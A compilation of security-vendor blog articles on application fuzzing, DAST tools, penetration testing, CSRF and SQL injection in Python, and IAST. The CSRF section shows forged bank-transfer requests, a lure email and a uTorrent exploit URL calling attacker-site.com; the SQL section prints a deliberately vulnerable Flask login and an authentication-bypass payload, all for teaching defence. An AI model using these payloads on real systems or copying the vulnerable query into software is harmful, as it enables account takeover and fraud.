Running an application fuzzer is one thing. Making sense of the results is another thing. When people ask what application fuzzing is, they often forget how much work goes into analyzing the output.

Application fuzzing can generate hundreds or even thousands of results. Not all of them are important. Some crashes are harmless while others point to weaknesses. The challenge is figuring out which one is which.

This is where validation becomes important. Of just flagging issues, teams need to confirm whether a finding is actually exploitable. Reproducing the issue, checking logs, and understanding application behavior all play a role.

Reducing positives is not about ignoring results. It is about filtering them intelligently so teams can focus on what really matters about application fuzzing.

See Additional Guides on Key Machine Learning Topics

Together with our content partners, we have authored in-depth guides on several other topics that can also be useful as you explore the world of machine learning.

Advanced Threat Protection

Authored by Cynet

Multi GPU

Authored by Run.AI

Auto Image Crop

Authored by Cloudinary

6 Best DAST Tools You Should Know in 2024

What are DAST Tools?

Dynamic application security testing (DAST) tools provide automated security testing for various real-world threat scenarios. You can use DAST tools to identify security vulnerabilities in running applications, and remediate them so external threat actors cannot exploit them.

Unlike white-box testing, which involves getting access to the source code, DAST takes a black-box approach, emulating an external attacker. DAST tools interact with web applications and APIs and identify which vulnerabilities can actually be exploited by attackers. They can then provide actionable insights to developers to help them remediate those vulnerabilities.

In this article:

Why Do You Need DAST Software?

DAST software can help you identify security weaknesses and fix them, ideally before attackers can exploit them to hack your application. Here are several threats you can identify using DAST tools:

  • SQL injection (SQLi)—a web-based attack that enables threat actors to gain access and control over a web application database. Threat actors achieve this by inserting arbitrary SQL code into a database query. 
  • Cross-site scripting (XSS)—this vulnerability enables threat actors to inject malicious code into a web application. Once they’re in, threat actors can steal session cookies, user credentials, or other sensitive information.
  • eCommerce attacks—threat actors look for vulnerabilities in eCommerce platforms and content management systems (CMS) that provide easy targets. They try to stay in for a long time to reach as many targets as possible.

Successful attacks on web applications can result in information theft, especially when the breach goes undetected. Threat actors can exploit web application vulnerabilities to gain unauthorized access to personally identifiable information (PII) and credit card information. 

DAST tools provide visibility into potential weaknesses and application behaviors that threat actors can exploit. These tools aim to provide you with this information before threat actors can discover and capitalize on these vulnerabilities.

Related content: Read our guide to DAST vs SAST

6 DAST Solutions and Tools

Bright Security

Bright Security tests every aspect of your apps. It enables you to scan any target, including web applications, internal applications, APIs (REST/SOAP/GraphQL), and server side mobile applications. It seamlessly integrates with the tools and workflows you already use, automatically triggering scans on every commit, pull request or build with unit testing. Scans are blazing fast, enabling Bright to work in a high velocity development environment.

Instead of just crawling applications and guessing, Bright interacts intelligently with applications and APIs. Our AI-powered engine understands application architecture and generates sophisticated and targeted attacks. By first verifying and exploiting the findings, we make sure we don’t report any false positives. 

Related content: Read our guide to iast vs dast.

Key features include:

  • Seamlessly integrates with existing tools and workflows—works with your existing CI/CD pipelines. Trigger scans on every commit, pull request or build with unit testing.
  • Spin-up, configure and control scans with code—one file, one command, one scan with no need for UI-based configuration.
  • Super-fast scans—interacts with applications and APIs, instead of just crawling them and guessing. Scans are made faster by an AI-powered engine that can understand application architecture and generate sophisticated and targeted attacks.
  • No false positives—uses AI analysis and fuzz testing to avoid returning false positives, so developers and testers can focus on releasing code.

Get a free plan and try Bright Security today!

ZED Attack Proxy (ZAP)

License: Apache 2.0

GitHub Repo: https://github.com/zaproxy/zaproxy 

OWASP ZAP (Zed Attack Proxy) is an open source web application security scanner. It is suitable both for experienced penetration testers and developers and QA testers who do not have security expertise. 

ZAP is now the most active project maintained by OWASP, with thousands of individual contributors. It is available in 29 languages on Linux, Windows, and Mac. It also acts as a proxy server to handle HTTP/S requests, and includes a daemon mode that can be controlled using a REST API.

Key features include:

  • Automated passive scanning
  • HTTP/S proxy server
  • Port identification
  • Directory searching
  • Brute force attack
  • Web crawler
  • Fuzz testing

Nikto 

License: GPL 2.0

GitHub Repo: https://github.com/sullo/nikto 

Nikto is an open source web server scanner that can check for:

  • Currently installed web server software
  • 6700 potentially dangerous files on a web server
  • Old versions of 1250 server packages
  • Version-specific issues on 270 server packages
  • Misconfigurations such as multiple index files, content delivered over HTTP

The project is actively maintained with new scan items and plug-ins updated regularly. A downside is that this tool is not stealthy and scans might be blocked by IPS/IDS systems. For a more realistic test, you can try combining this tool with LibWhisker to circumvent IDS.

GoLismero

golismero

License: GPL 2.0

GitHub Repo: https://github.com/golismero/golismero 

GoLismero is an open source framework for security testing focused on web security. Key features include:

  • Works on any platform, tested on Windows, Linux, *BSD, Apple OS X.
  • Written in pure Python with no library dependencies.
  • High performance compared to similar frameworks. 
  • Easy to learn, use, and develop custom plugins.
  • Integrates and collects results from other popular tools like sqlmap, XSSer, OpenVAS.
  • Enables scans for vulnerabilities according to CWE, CVE, and OWASP definitions.

Nuclei

License: MIT

GitHub Repo: https://github.com/projectdiscovery/nuclei 

Nuclei provides security scanning for web protocols such as TCP, DNS, HTTP, SSL, File, Whois, and Websocket. It uses a flexible templating engine that lets it conduct a variety of security checks. Because the tool sends requests based on templates, it can enable fast scans across many hosts with no false positives.

Nuclei has a repository of vulnerability templates contributed by over 300 security researchers. These include:

  • 1114 templates for specific CVEs
  • 454 templates for LFI vulnerabilities
  • 351 templates for XSS vulnerabilities
  • 281 templates for RCE vulnerabilities
  • 246 templates for testing vulnerable WordPress plugins

See a full list of templates here.

Deepfence ThreatMapper

License: Apache 2.0

GitHub Repo: https://github.com/deepfence/ThreatMapper 

ThreatMapper automatically detects, identifies, and queries cloud-based infrastructure. It works with compute instances in public clouds, Kubernetes nodes, and serverless resources, helping to discover cloud native applications and containers and map their topology in real time. The tool can help discover and visualize attack surfaces in cloud native workloads.

Key features include:

  • Scanning build artifacts for vulnerabilities during builds and integrating with CI/CD pipelines.
  • Prioritization of vulnerabilities based on CVSS scores
  • Scanning container registries for vulnerable containers before deployment.
  • Scanning production environments for host, container, and application vulnerabilities.
  • Discovering production applications, including complex microservices applications, and mapping their topology.
  • Continuous scanning of production systems to identify new vulnerabilities.
  • Scanning hosts and containers and recommending how to harden configuration.
  • Capture and archive network traffic, including TLS decryption.

Conclusion

While there are many solutions out there, Bright Security is at the forefront of DAST technology. We have raised a $20 million funding round to continue pioneering the field, helping secure apps and APIs, without slowing down software development processes.

Learn more about Bright Security—the state of the art in DAST technology 

DAST vs Penetration Testing: What Is the Difference?

What Is DAST?What Is Penetration Testing?
Dynamic Application Security Testing (DAST) is a solution used to analyze web applications at runtime to identify security vulnerabilities and misconfigurations. DAST tools provide an automated way to scan running applications and try to attack them from a hacker’s perspective. They can then offer valuable insights into how applications are behaving, identify where hackers can launch attacks, and provide actionable guidance on how to remediate vulnerabilities.
DAST tools take a black box approach to testing. They run outside the application without having access to its source code or internal architecture. DAST can be used to identify and resolve all common web application vulnerabilities including broken access control, cross-site scripting (XSS), SQL Injection (SQLi), and cross site request forgery (CSRF).
Penetration testing (also called pentesting) is a cybersecurity technique used by organizations to identify, actively exploit, and remediate vulnerabilities in applications and their security controls. Penetration tests are usually conducted by ethical hackers, who can be internal employees or contractors of an organization. 
Ethical hackers use the same tactics and behaviors as real hackers to assess how an organization’s computer systems, networks, or web applications could be attacked. Organizations can use the resulting report of a penetration test to discover and remediate vulnerabilities, and for compliance purposes.
Ethical hackers are security professionals who use a variety of methods, tools, and techniques to simulate cyberattacks against an organization. The term “penetration” refers to the degree to which a hypothetical threat actor or hacker can break past an organization’s security measures and cause damage.

In this article:

How Is a Typical Pen Test Carried Out?

Step 1: Reconnaissance

Penetration testing begins with reconnaissance. At this stage, ethical hackers spend time gathering data they use to plan their simulated attack. Based on this data they identify vulnerabilities, find a viable attack vector, gain and maintain access to the target system. 

Step 2: Exploitation

The penetration testing process requires an extensive set of tools. These include network and vulnerability scanning software, as well as tools that can launch specific attacks and exploits such as brute-force attacks or SQL injections. There is also hardware designed specifically for penetration testing. For example, there are hardware devices that connect to a computer on a network and give hackers remote access to that network. 

Another tool in the pentesting arsenal is social engineering. Ethical hackers might use techniques like phishing emails, pretexting (pretending to be an authority or someone known by the victim), and tailgating (entering a building immediately after an authorized person).

Step 3: Disengagement

After a penetration tester achieves access to sensitive systems and demonstrates their ability to steal data or perform other damage, they disengage, covering their tracks to avoid detection.

Step 4: Report and resolution of discovered weaknesses

The final and most important stage of a penetration test is the pentest report. This is a detailed report the ethical hacker shares with the target company’s security team. It documents the pentesting process, vulnerabilities discovered, proof that they are exploitable, and actionable recommendations for remediating them. 

Internal teams can then use this information to improve security measures and remediate vulnerabilities. This can include patching vulnerable systems. These upgrades include rate limiting, new firewall or WAF rules, DDoS mitigation, and stricter form validation.

How Does DAST Work?

DAST tools go into action when an application is deployed, either in a test or staging environment or in a real production environment. They can continuously scan applications to discover new vulnerabilities or misconfigurations that are introduced over time.

Most DAST tools only test the exposed HTTP and HTML interfaces of web-enabled applications, but some also support APIs and protocols like Remote Procedure Call (RPC) and Session Initiation Protocol (SIP). DAST tools start by crawling web applications to identify URLs, forms, and other exploitable elements. A DAST tool attempts to find all the ways an application accepts input from users, testing these inputs one by one.

DAST tools can be automatically run at multiple stages of the testing and deployment process, allowing teams to quickly identify and address risks before security incidents occur. When a vulnerability is discovered, the DAST solution sends an automatic alert to the appropriate development team for the developer to fix. Some DAST solutions integrate directly with bug trackers to integrate smoothly into the development process.

DAST works best as part of a comprehensive approach to web application security testing. While DAST provides security teams with timely insight into how web applications behave in production environments, businesses often use DAST for application penetration testing and static application security testing (SAST) to discover additional vulnerabilities during early development stages.

Related content: Read our guide to DAST vs. SAST

DAST vs Penetration Testing

DAST and penetration testing are often confused because of their role in helping detect application vulnerabilities. What they have in common is that both of them are black box testing techniques, which attempt to exploit vulnerabilities in applications. However, the similarities end there:

  • DAST uses a dynamic approach to testing web applications, while penetration testers can use both dynamic and static methods.
  • DAST tools are automatic, while penetration tests are usually manual (although there is a growing category of automated penetration testing tools)
  • DAST tools can be run at any time, enabling continuous testing and scanning of an application. Manual penetration tests are performed infrequently—typically quarterly or annually.
  • DAST tools are inexpensive and can typically be run as many times as needed (depending on the licensing model). Penetration tests conducted by ethical hackers are high-cost and limited to a single, well-scoped penetration test.
  • DAST tools can generate false positives—they might discover issues that are not real vulnerabilities. Penetration testing, by definition, does not result in false positives. However, modern DAST tools use artificial intelligence (AI) and fuzzing tools to close this gap and provide reports with zero false positives.
  • DAST tools can be run by anyone—security teams, developers, or even automatically with no human intervention. Pentesting requires deep expertise.
  • DAST tools have higher return on investment (ROI) because they can discover issues earlier in the development process. Pentesting is almost always conducted on production applications, so the cost of fixing issues is much higher.

Bright Security’s Next-Gen DAST Solution

Unlike other DAST solutions, Bright Security was built from the ground up with developers in mind. It lets developers automatically test their applications and APIs for vulnerabilities with every build.

Bright Security tests every aspect of your apps. It enables you to scan any target, including web applications, internal applications, APIs (REST/SOAP/GraphQL), and server side mobile applications. It seamlessly integrates with the tools and workflows you already use, automatically triggering scans on every commit, pull request or build with unit testing. Scans are blazing fast, enabling Bright to work in a high velocity development environment.

Instead of just crawling applications and guessing, Bright interacts intelligently with applications and APIs. Our AI-powered engine understands application architecture and generates sophisticated and targeted attacks. By first verifying and exploiting the findings, we make sure we don’t report any false positives. 

Get a free plan and try Bright Security today!

3 Simple CSRF Examples: Understand CSRF Once and For All

What is CSRF (Cross Site Request Forgery)?

Cross-site request forgery (CSRF) is a technique that enables attackers to impersonate a legitimate, trusted user. CSRF attacks can be used to change firewall settings, post malicious data to forums, or conduct fraudulent transactions. In many cases, affected users and website owners are unaware that an attack occurred, and become aware of it only after the damage is done and recovery is not possible.

CSRF attacks exploit a mechanism that makes the sign-in process more convenient. Browsers often automatically include credentials in the request when a user tries to access a site. These credentials can include the user’s session cookies, basic authentication credentials, IP address, and Windows domain credentials.

If there is no protection against CSRF attacks, it can be easy for an attacker to hijack the session and impersonate the user. Once a user is authenticated on the site, the site cannot differentiate between a legitimate user request and a fake request sent by the attacker.

In this article:

CSRF Attack Examples

1. Bank Transfer Using GET or POST

Consider a user who wants to transfer an amount of $5,000 to a family member via the web application of Acme Bank, which has a CSRF vulnerability. An attacker identifies this vulnerability and wants to intercept this transaction so that the funds are transferred to their bank account instead of to the intended recipient.

The attacker can construct two types of URLs to perform the illicit funds transfer, depending on whether the application was designed using GET or POST requests.

Forged GET request

The original request would look like something like this, transferring the amount to account #344344:

GET http://acmebank.com/fundtransfer?acct=344344&amount=5000 HTTP/1.1

The attacker’s forged request might look like this. The attacker changes the account number to their own account (#224224 in this example) and increases the transfer amount to $50,000:

http://acmebank.com/fundtransfer?acct=224224&amount=50000

Now the attacker needs to trick the victim into visiting this forged URL while signed into the banking application. The attacker might draft an email like this:

To: Victim
Subject: A gift of flowers for you!

Hello victim,
We know your birthday is coming up and have a special gift for you. Just click here to receive it!

The link “click here” would lead to the forged URL shown above.

Alternatively, the attacker could display a pixel within the email that fires and activates the URL if the victim enables viewing images in their email client. This is more dangerous because it requires no direct user action:

Forged POST request

If the banking application uses POST requests, the user’s original operation would look like this:

POST http://acmebank.com/fundtransfer HTTP/1.1
acct=344344&amount=5000

In this case, the attacker would need to craft a

element with the forged request: 





When the user submits the form, believing they will receive a gift, the post request is executed and, if the user is currently signed into the application, the illicit transfer is carried out.

2. Changing Password with Self-Submitting Form

Consider a vulnerable application that allows users to change their password via a POST request. The original form looks like this:




The attacker can create a copy of this form, changing the password to one known by the attacker (123 in this example):


    

Unlike the original form, the attacker’s version does not have a submit button, and has a script that automatically submits the form as soon as the user loads the HTML.

The attacker hosts this form on a malicious website. To trick users, they can use a domain name similar to the bank’s one, like this: 

https://acme-bank.biz/password.html

The attacker needs to trick the victim into visiting the above URL—for example by sending an email that is supposedly from the bank. When a victim visits the URL, the following HTTP POST is generated:

POST /password.php HTTP/1.1
Host: acmebank.com
Origin: http://acme-bank.biz
Referer: https://acme-bank.biz/password.html
Cookie: SESSION=d33567b639c534e664
Content-Type: application/x-www-form-urlencoded
password=123

In this forged POST request, the Host is the vulnerable application, acmebank.com, but the Origin and Referer indicate the request is really coming from the attacker’s malicious site, acme-bank.biz. We are assuming the user previously signed into the banking application so the Cookie field retains their valid session ID. 

This vulnerable application will authenticate the request based on the recognized session ID, and accept the form contents, changing the password to the attacker’s desired string.

3. Real-Life uTorrent Attack: Deploying Malware via Forged GET Request

The uTorrent vulnerability discovered in 2009 (CVE-2008-6586) was a real-life, large-scale CSRF attack. The uTorrent software had a vulnerability that allowed its web console to be accessible at localhost:8080, allowing attackers to perform sensitive actions with a simple GET request.

uTorrent built its web interface in such a way that GET requests enabled state-changing operations. According to the HTTP/1.1 standard (RFC 2616), GET and HEAD methods should never be state changing, and should only be used to allow clients to retrieve data.

Attackers discovered two exploitable URLs that could allow them to deploy malware to a victim’s device. This URL forced a torrent file download:

http://localhost:8080/gui/?action=add-url&s=http://attacker-site.com/malware

This URL changed the administrator password of the uTorrent software:

http://localhost:8080/gui/?action=setsetting&s=webui.password&v=newpassword

The attackers added HTML elements with automatic action triggered by JavaScript on multiple Internet forums, and also sent spam emails with these elements to a large distribution list. Anyone who had the uTorrent application while visiting the forum page or opening the email was hit by the attack. The attack enabled the attackers to deploy malware on a large number of client devices.

Related content: See more real-life attack examples in our guide to CSRF attacks

Preventing CSRF Attacks

Implementing CSRF Tokens

Organizations can easily block most CSRF attacks using CSRF tokens. These are unique challenge tokens that can be added to sensitive user requests, such as making a purchase, transferring funds, or creating an admin account on the website backend. Developers can add a CSRF token to every state change request and properly validate these tokens when processing the request, to ensure that the authenticated user sent the request legitimately.

Whenever the server renders a page with a sensitive operation, a unique CSRF token is passed to the user. For this to work properly, the server must perform the requested operation only when the token is fully validated and reject all requests for invalid or missing tokens. However, a common mistake when implementing CSRF is to reject requests with invalid tokens, but continue accepting requests with missing tokens. This makes the CSRF token ineffective.

Related content: Read our guide to CSRF tokens

Checking for CSRF Vulnerabilities

To check for a CSRF vulnerability, look for a form where users can submit a request and verify that the anti-CSRF token was generated correctly. Most modern web frameworks include an anti-CSRF token on every form page and can be configured globally to handle validation transparently. 

Whenever a user can submit a request that changes system state, the request must be protected with a CSRF token. If the form is not intended to allow users to make stateful changes, developers must limit its scope to prevent abuse by attackers.

Combining CSRF Tokens with Other Protections

CSRF tokens can also be used with other protective techniques, such as: 

  • Setting session cookies using the SameSite cookie attribute. This property instructs the browser to control whether cookies are sent with requests from third-party domains. 
  • Adding the HttpOnly property to avoid some types of cross-site scripting (XSS) flaws. Preventing XSS vulnerabilities can also make it more difficult to conduct CSRF attacks.

Conduct Regular Web Application Security Tests to Identify CSRF

Even if vulnerabilities in web applications with CSRF attacks are successfully addressed, application updates and code changes may expose your application to CSRF in the future. Dynamic Application Security Testing (DAST) helps you continuously scan and test for potential security weaknesses in web applications, including CSRF vulnerabilities.

Bright Security is a next-generation DAST solution that helps automate the detection and remediation of many vulnerabilities, including CSRF, early in the development process.

By shifting DAST scans left, and integrating them into the SDLC, developers and application security professionals can detect vulnerabilities early, and remediate them before they appear in production. Bright Security completes scans in minutes and achieves zero false positives, by automatically validating every vulnerability. This allows developers to adopt the solution and use it throughout the development lifecycle. 

SQL Injection Python: Attack Example and 4 Tips for Prevention

What is SQL Injection?

SQL injection (SQLi) involves adding malicious code to a database query to gain unauthorized access to a web application’s database. Threat actors employ SQL injection techniques to manipulate SQL code, intending to execute malicious code that can help them gain access to sensitive data or compromise the database server. 

A successful SQL injection attack can potentially expose any data stored by the database, including intellectual property, administrative credentials, and customer data. Threat actors can use SQL injection to target any SQL database, such as MySQL, SQL Server, and Oracle. Typically, SQL injection attacks target web applications using a database on the back end.

SQL injection is a common security exploit. Threat actors employ this technique frequently, using automated tools to increase the number of attacks they can launch and the scope of the attack. SQL injection is ranked #3 in the OWASP Top 10 lists of web application vulnerabilities. 

In this article:

How Do SQL Injection Attacks Work?

Threat actors launch SQL injection attacks by first identifying vulnerable user inputs in a web application or page employing user input directly within an SQL query. This vulnerability allows actors to create and send input content (malicious payload) that executes malicious SQL commands in the database.

Web applications and sites typically store all data in SQL databases. SQL is a query language that manages the data stored in a relational database. SQL commands perform actions on data, allowing access, deletion, and modification. It may also allow running operating system commands. As a result, successful SQL injection attacks can lead to critical consequences.

Threat actors launch SQL injection attacks to gain unauthorized access to data and then steal it, modify it, delete it, or perform malicious actions on the breached database. For example, SQL injection can grant access to user credentials, allowing actors to impersonate database users. If the user is a database administrator, the actor gains access to all database privileges.

SQL enables authorized users to choose data and output it from the database. SQL injection vulnerabilities can allow threat actors to gain unauthorized access to all data in the database server. Threat actors can use the privileged obtained through SQL injection to modify data, add new data to the database, delete records, and drop tables.

Example of SQL Injection in Python

The following example shows a SQL injection vulnerability in a Flask application. It is based on code provided by SecureFlag.

The application defines a route for the URL /login and requests credentials from the user:

@app.route("/login")
def login():
  username = request.values.get('username')
  password = request.values.get('password')

Next, the application connects to a database running on the localhost:

  db = pymysql.connect("localhost")
cursor = db.cursor()

This part of the application is vulnerable to SQL injection. The app runs a SQL query in which it insecurely concatenates the username and password fields:

  cursor.execute("SELECT * FROM users WHERE username = '%s' AND password = '%s'" % (username, password))

If the query returns a matching record, the application logs the user in:

  record = cursor.fetchone()

  if record:

    session['logged_user'] = username
 db.close()

Because the application accepts user inputs and processes them with no validation as part of the SQL query, it is possible for the attacker to switch context and override the authentication mechanism. 

For example, the attacker could inject the following string into the username field:

john' OR 'a'='a';-- 

The following query is then submitted to the database:

SELECT * FROM users WHERE username = 'john' OR 'a'='a';-- AND password = '';

Because the ‘a’=’a’ statement is always true, the expression allows the attacker to login with the username john, if it exists, or with the first entry in the user table. The characters ;–  comment out the rest of the SQL query, causing the application to ignore the password field.

See examples of real-life attacks in our guide to SQL injection attacks

4 Tips for Preventing SQL Injection in Python

The most important way to prevent SQL injection is to avoid vulnerable code and insecure coding practices. Here are a few ways to do that—they will be effective against SQL injection and many other vulnerabilities that can affect your Python code.

1. Insecure Packages

When you import a module into a Python application, the interpreter runs the code. This means you should be careful when importing modules. 

The PyPi package index is a great resource, but there is no verification that all the code in libraries listed there is secure. Many malicious packages exist on PyPi, some of them attempt to trick users by adopting the names of well known libraries with small misspellings. 

If you are unsure of the authenticity and contents of the outer packaging, investigate further, and if you are still unsure about its origin or security status, don’t use it.

2. Identifying Vulnerabilities

The first step in preventing vulnerabilities is to create a checklist of security best practices and review it before releasing your code or promoting it to a test environment. You should adhere to these best practices at the development stage, and automatically verify them at the testing stage. Ideally, you should adopt automated tools that scan your code at all stages of the software development lifecycle (SDLC).

3. Use Linters and Static Analysis Tools

Linters are tools that provide automated recommendations about good coding practices. They are a simple form of static application security testing (SAST) tools, which analyze source code during the development phase of a project. Linters can be used manually in the editor, as part of a local development process, or as part of an automated testing process. 

There are several linters in Python, including:

  • Pylint—Python’s de facto linter, which emphasizes bad code practices, some of which can lead to vulnerabilities. However, it does not provide extensive security recommendations.
  • Bandit—you can use this tool to discover common security issues in Python code. Bandit processes each file, creates an AST node, and runs the appropriate plugin to test it.
  • Python IDEs like PyCharm and Wingware have these tools and others will be built in, as well as plugins for text editors that can provide security guidance.

Related content: Read our guide to SAST

4. Use Dynamic Application Security Testing

Dynamic Analysis Security Testing Tool, or DAST Testing, is an application security solution that helps web developers discover specific vulnerabilities while running in staging or production environments.

DAST testing can find a wide range of vulnerabilities, including I/O validation issues that can make applications vulnerable to SQL injection attacks. The major benefit of DAST testing is that it can validate that a vulnerability is really exploitable—meaning that attackers can actually perform a successful SQL injection attack. DAST testing can also help identify misconfigurations and errors that could lead to a SQL injection attack.

DAST Testing for Python Applications with Bright Security 

Bright Security helps automate the detection and remediation of many vulnerabilities including SQLi, early in the development process, across web applications and APIs. 

By shifting DAST scans left, and integrating them into the SDLC, developers and application security professionals can detect vulnerabilities early, and remediate them before they appear in production. Bright Security completes scans in minutes and achieves zero false positives, by automatically validating every vulnerability. This allows developers to adopt the solution and use it throughout the development lifecycle. 

Scan any web app, or REST, SOAP and GraphQL APIs to prevent SQL injection vulnerabilities – try Bright Security free.

IAST

What is Interactive Application Security Testing (IAST)?

Interactive application security testing (IAST) solutions help detect and remediate vulnerabilities in web applications, as part of an organization’s security testing toolset.

IAST involves using dynamic testing, also known as runtime testing, to monitor application performance. IAST solutions instrument applications during runtime, using specialized sensors, to collect operational data and analyze user interactions with the application. 

The IAST process can incorporate a combination of automated security tests, customized tests defined by the organization, or software composition analysis (SCA) to analyze open source components and find known vulnerabilities.

In this article:

How Do IAST Tools Work?

IAST tools deploy agents and sensors in the application during the post-build phase of the software development cycle. The agent works by observing the application’s performance and analyzing traffic flow. It maps external signatures or source code patterns to identify complex security vulnerabilities. 

IAST tools provide a dashboard or web browser that lets you view testing reports in real-time and use customized reports that suit your CI/CD pipeline. You can also combine IAST results with other issues tracking tools.

IAST vs SAST vs DAST

Static application security testing (SAST) is a white box method that checks your code for vulnerabilities and flaws. It involves scanning code at rest and searching for known errors or an established set of rules. During the scan, a human or an automated program scans static code instruction by instruction and line by line. 

Dynamic application security testing (DAST) is a black box method that checks running applications for security vulnerabilities and weaknesses. It involves looking for ways to attack the application without getting authorized access to the source code. A pentester or tool performing DAST simulates an external attack, typically by injecting or feeding malicious or faulty data to the tested software.

Related content: Read our guide to DAST vs SAST

IAST employs both DAST and SAST techniques to test the inner workings of the source code, usually while the application is in development. IAST does not simulate an external attack and does not scan the entire codebase. Instead, DAST checks functionality at specific predefined points to achieve faster testing times. As a result, IAST does not provide complete coverage.

IAST Benefits and Drawbacks

Here are notable benefits of IAST:

  • Scans code in production—SAST tools often result in numerous false positives. For example, reporting a line of code can that was already addressed in another area of the code. IAST scan code in production while focusing only on issues that truly matter.
  • Scans code in development—IAST can help shift security checks to the left by checking specific issues during development. For example, IAST tools with IDE integration can offer quick feedback on features in development. 
  • Quick remediation—IAST helps link issues with specific code locations. It enables developers to quickly click through an application to find specific problems and gain insights into quick remediation recommendations. 

Here are notable drawbacks of IAST:

  • Programming-language dependent—IAST tools are often bound to specific technologies that may not fit your scenario. Additionally, some tools may require changing your code to include the vendor’s sensor modules.  
  • Time intensive—IAST requires building and executing the tested application, which takes more time overall. If you use IDE plugins, you can leverage the quick feedback to catch issues during development. However, it can take longer when building big test suites that run on all production releases.
  • Does not provide complete code coverage—IAST scans only executed code to help reduce the number of false positives. It means the test does not cover all the code, including any code that was accidentally released without going through a quality assurance check.

Related content: Read our guide to shift left testing.

How to Choose IAST Software

Evaluate the following criteria when selecting an IAST solution:

  • Regulations and standards—IAST solutions must be able to scan for vulnerabilities and produce reports in line with the standards and regulations your organization complies with, such as GDPR, HIPAA, PCI DSS, and SOC 2.
  • Low false positives—an IAST solution should reduce the time needed to find and eliminate false positives. It should do so without requiring reconfiguration of the tool, custom services, or ongoing tuning.
  • Automated vulnerabilities identification—an IAST solution should accurately detect known vulnerabilities while your team performs functional tests. High severity bugs should create a ticket in your bug tracking system or break the build, while sending alerts to your developers.
  • Microservices support—microservices are a mainstream method for application development, and they introduce additional attack vectors. An IAST solution should allow you to assess multiple microservices from a single interface. Learn more in our guide to microservices security.
  • Ease DevOps agile workflows deployment—IAST tools must integrate into the existing DevOps pipeline and work seamlessly with standard build and testing tools.

Sensitive data tracking—IAST should help protect personally identifiable information (PII) and company IP. You should be able to automatically track sensitive information in your applications.

Do you want to try a false-positive free DAST tool instead? Sign up for a FREE Bright account and start testing in minutes.